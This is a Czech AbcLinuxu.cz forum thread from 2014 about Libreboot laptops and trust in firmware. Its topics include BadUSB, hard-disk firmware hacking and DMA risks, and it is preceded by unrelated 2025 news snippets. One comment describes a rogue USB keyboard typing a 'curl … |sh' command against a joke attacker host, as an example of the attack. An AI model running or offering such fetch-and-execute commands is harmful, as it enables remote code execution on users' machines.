V linuxových systémech byly odhaleny dvě závažné zranitelnosti – CVE-2025-6018 v rámci PAM (Pluggable Authentication Modules) a CVE-2025-6019 v knihovně libblockdev, kterou lze zneužít prostřednictvím služby udisks. Ta je součástí většiny běžně používaných distribucí, jako jsou Ubuntu, Debian nebo Fedora. Kombinací obou zranitelností může útočník s minimálním úsilím získat root přístup. Vzhledem k jednoduchosti zneužití
… více »OpenSSL Corporation zve na den otevřených dveří ve středu 20. srpna v Brně a konferenci OpenSSL od 7. do 9. října v Praze.
Něco z IT bulváru: Mark Russinovich pozval Billa Gatese, Linuse Torvaldse a Davida Cutlera na večeři a zveřejnil společné selfie. Linus se s Billem ani s Davidem do té doby nikdy osobně nesetkal. Linus a David měli na sobě červená polotrika. Mark a Bill byli v tmavém [LinkedIn].
Evropská unie nově prověřuje obchod, při němž americký miliardář Elon Musk prodal svou sociální síť X dříve známou jako Twitter vlastnímu start-upu xAI za 33 miliard dolarů (712 miliard Kč). Unijní regulační úřady zvažují, zda firmě X neudělit pokutu podle nařízení Evropské unie o digitálních službách (DSA).
Vývojáři postmarketOS vydali verzi 25.06 tohoto před osmi lety představeného operačního systému pro chytré telefony vycházejícího z optimalizovaného a nakonfigurovaného Alpine Linuxu s vlastními balíčky. Přehled novinek v příspěvku na blogu. Na výběr jsou 4 uživatelská rozhraní: GNOME Shell on Mobile, KDE Plasma Mobile, Phosh a Sxmo.
Svobodný kancelářský balík ONLYOFFICE (Wikipedie) byl vydán ve verzi 9.0. Jak online Docs, tak i offline Desktop Editors. Přehled novinek také na YouTube.
Byla vydána nová verze 5.2.0 programu na úpravu digitálních fotografií darktable (Wikipedie).
XLibre Xserver je fork X.Org Serveru. Enrico Weigelt včera oznámil vydání verze 25.0 se slovy "tento fork je nezbytným, protože je výslovným přáním většiny současné skupiny X.Org (IBM / Red Hat) opustit projekt, nechat ho navždy shnít a blokovat jakékoli podstatné příspěvky, natož nové funkce".
Na čem aktuálně pracují vývojáři GNOME a KDE Plasma? Pravidelný přehled novinek v Týden v GNOME a Týden v KDE Plasma.
Experti na kybernetickou bezpečnost potvrdili (en) největší dosud zaznamenaný únik dat. Hackeři při něm odkryli skoro 16 miliard přihlašovacích údajů z celého světa včetně účtů společností Google, Apple, Facebook, dalších sociálních sítí nebo některých serverů státní správy.
6.8.2014 14:43
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
6.8.2014 17:09
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:52
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
7.8.2014 21:37
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
7.8.2014 21:42
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 15:44
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
A doted sem nezjistil, za co se mi vlastne mstis. Jen me tesi, ze te to tak vytocilo.
Co tu mám předvyplněno jako nick mě fakt nijak nezaměstnává
To te muselo neco vytocit. A poradne A to je fajn.
Otazka za zlateho bludistaka: cim to je, ze nadavam zrovna tobe (hele ty jsi ten troll co porad utoci na hagaru, zejo?)?
6.8.2014 17:16
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pro koho je tohle vlastne urcene?Pro lidi, kteří potřebují lowlevel přístup k hardware a potřebují hackovat bootovací proces. A pro lidi, kteří se bojí bezpečnostních chyb v originálním firmware (schválně nepíšu backdoorů, protože ty jsou v hardware; i když třeba AntiTheft s 3G modemem otevírá netušené nové možnosti; ale anténa k tomu modemu lze odstranit pájkou).
BTW jeste mi tam jeste chybi LibreCPU (InteLibre CoreDuo ?), LibreChipset, LibreNIC, LibreUSB, a dalsi...LibreCPU a LibreChipset. Ethernet je celkem jednoduchej. USB je horší.
6.8.2014 17:18
Jendа | skóre: 78
| blog: Jenda
| JO70FB
.
7.8.2014 00:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud věříš čipu, tak by ta ao486 měla jít spustit klidně na parallelleNo ale furt potřebuješ proprietární Xilinxové tooly, abys vygeneroval bitstream, ne? A k samotnému formátu bitstreamu žádná dokumentace neexistuje a k čipu už vůbec ne.
).
6.8.2014 17:32
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
USB je horší.Ano, hlavne po tom, co predvedli na Black Hatu
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...
6.8.2014 18:06
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Ano, hlavne po tom, co predvedli na Black HatuMyslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota. Phantom keyboard je tady už dlouho (NSA Litoměřice vám ji umí dodat přes noc) a to reprogamování flashek je zajímavé z hlediska hackování („jak jsem flashku předělal na ovladač jaderného reaktoru“), ale z bezpečnostního mě to moc nevzrušuje. Rozumné operační systémy mají samozřejmě firewall driverů a zeptají se, než připojí nové zařízení - a když připojím flashku a systém mi napíše „Našel jsem HID vstupní zařízení, chceš ho připojit jako klávesnici?“ a „Zařízení zadalo
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz<Alt><F2> curl b.nsasumperk.cz|sh<Return>“, tak se na toho, kdo mi tu flashku dal, usměju, informaci zavedu do systému GlobalEye a tím to končí.
A že to umí emulovat síťovku? Pokud nemáte rozbitej network manager (myslím ten typ software, ne tu konkrétní implementaci, která se naneštěstí jmenuje NetworkManager), tak vám po připojení síťovky přece nebude automaticky konfigurovat její DNS.
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :). Neomezené DMA do paměti to nemá (to už spíš je problém řadič, který sedí typicky na PCIe a může si vynutit bus mastering) a s daty to moc manipulovat nemůže, protože ze systému mu chodí už zašifrované bloky.
Ehm... Hard disk hackingJeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :)
6.8.2014 18:26
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:51
Jendа | skóre: 78
| blog: Jenda
| JO70FB
(nemám moc jiných možností jak to nabootovat).No, to ne no, leda si s sebou nosit flashku nebo SD kartu, ale vrchol praktičnosti to není...
6.8.2014 20:37
xkucf03 | skóre: 49
| blog: xkucf03
Nebo SecureBoot (kdyby tahle technologie pracovala ve prospěch uživatele). Ideálně mít právě ten coreboot/libreboot jako bezpečný startovací bod a pak z něj můžeš ověřit integritu boot sektoru, zavaděče nebo jádra.
6.8.2014 21:12
xkucf03 | skóre: 49
| blog: xkucf03
Přečteš si jeho zdrojáky a zkompiluješ si ho. Otázka je, kde vzít ten první důvěryhodný počítač, na kterém tohle udělat. Asi by šlo použít větší počet různě starých počítačů od různých výrobců a porovnat, zda výsledek je stejný. 
(že by byl ve všech stejný backdoor je nepravděpodobné)
7.8.2014 10:13
xkucf03 | skóre: 49
| blog: xkucf03
Za předpokladu, že to kontroluješ na důvěryhodném počítači1 a ten disassembler ti nekecá. Ale uznávám, že tohle je už hodně paranoidní
[1] a ten vezmeš kde?
7.8.2014 14:58
pavlix | skóre: 54
| blog: pavlix
7.8.2014 14:59
xkucf03 | skóre: 49
| blog: xkucf03
Proto jsem navrhoval radši to použití více různě starých počítačů – z nich si vyděruješ programy a porovnáš, jestli jsou díry na stejných místech.
6.8.2014 21:17
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 22:50
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
Myslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota.Pokud se nenajde nejaky 0day v USB stacku - vzpomen si na Stuxnet, tam je jich to na nic neptalo. Ja vim, ze to bylo na Widlich, ale Linux zacina byt taky v hledacku, hlavne po tom, co prosaklo, ze NSA zameruje "technicky zdatne uzivatele", cimz nemyslim to ohledne linuxjournal.
HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smažeMuze treba misto dat zapisovat nesmysly (k cemu jsou ti zasifrovana data, kdyz je neprectes). A taky - porad je to dual-core arm s dram, coz je prostredi pro beh cehokoli (nekde jsem mel odkaz, kde se na tm pokuseli rozbehnout linux).
7.8.2014 00:39
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud se nenajde nejaky 0day v USB stackuJo, to je pravda, že by se to pak dál šířilo. Spíš než přímo v USB stacku je ale podle mě mnohem (mnohem!) víc chyb v ovladačích zařízení. Zrovna včera v noci jsem ladil, proč mi nefunguje CH34xx (hint: řádek 312 a dál - what could possibly go wrong? :) a pokud jsou drivery běžně napsané tímto stylem, tak teda potěš koště. Další důvod pro driver firewalling.
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMASATA AFAIK jenom streamuje data, kam do paměti se zapíšou určuje řadič → musel by být bug tam (taky už jsem viděl řadič (VT6420), který uměl softwarově havarovat).
hint: řádek 312 a dálHehe, jaká krásná detekce NULL pointeru
(ale tady to aspoň není inline funkce, tam to je mnohem víc na pěst). Jinak ale myslím, že mnoho těch testů se neprovádí a předpokládá se, že kernel drivery jsou sane. Už třeba to vytáhnutí priv dat předpokládá validní pointer.
port_probe), takže driver může celkem spolehlivě předpokládat, že tam NULL nebude. Zjevně to není ten typ funkce, která by něco prováděla a mohla NULLem indikovat selhání, je to prostě getter.
7.8.2014 11:57
Jendа | skóre: 78
| blog: Jenda
| JO70FB
stty. A taky to při každém open() dělá znova celou inicializaci, což způsobí reset čipu a v tomto případě kvůli tomu i reset AVR, co je za ním.
a cortex m3, ktery udajne nic nedelaJe otázka zda by ten Cortex M3 stíhal zasahovat do práce těch dvou rychlých ARMů. Pořád může existovat normální firmware modul, který ho používá (ten člověk by musel dekompilovat všechny firmware moduly, aby si byl jistý). Nejspíš to bude pomocný procesor, který buď používají pro testování při provozu (ARMy "M" jsou malý). Nebo používá WD generickej čipset (seagate má tuším na zakázku).
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMA, otazka je, jestli se to neda vyuzit stejne jako Firewire, pokud ma clovek "spravny" firmware.Diskový řadič pouze posílá data na signál (od DMA řadiče nebo od CPU). IDE PRD tabulka (cílový region a délka) se klasicky nastavuje driverem. Zajímavý ale bude řešení toho SATA express portu (SATA+PCIe linka). Po PCIe se už dá zapisovat do hlavní RAM (ale to už zase bude nespíš s nějakým MMU pro PCIe).
USB je horší.Tak na USB full speed hosta jde použít PIC a nejspíš by šel bitbangovat na FPGA (blésmrt). A je dost možný, že budou existovat i nějaký phy bez integrovanýho firmware.
Dá se tady v ČR někde sehnat ten LibreBoot X60?
7.8.2014 08:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Díky za reakci. Může někdo prosím potvrdit, že má Jenda pravdu?
7.8.2014 12:20
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
Díky.
7.8.2014 19:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
jen by se asi hádali kvůli tomu librebootuNo tak se tam před reklamací vrátí původní firmware… Btw. Binary situation
7.8.2014 12:27
pavlix | skóre: 54
| blog: pavlix
7.8.2014 19:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
8.8.2014 00:01
pavlix | skóre: 54
| blog: pavlix
8.8.2014 06:24
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
8.8.2014 09:55
pavlix | skóre: 54
| blog: pavlix
8.8.2014 10:05
xkucf03 | skóre: 49
| blog: xkucf03
Nevíte někdo, jak je to s podporou virtualizace?
Na shop.gluglug.org.uk píší, že to má Core Duo T2400, což je podle Intelu 32-bit s podporou Intel® Virtualization Technology (VT-x) ovšem s poznámkou: This feature may not be available on all computing systems. A to jsem měl pocit, že se 32-bitové virtualizační procesory snad ani nedělaly.
8.8.2014 10:24
pavlix | skóre: 54
| blog: pavlix
Tiskni
Sdílej:
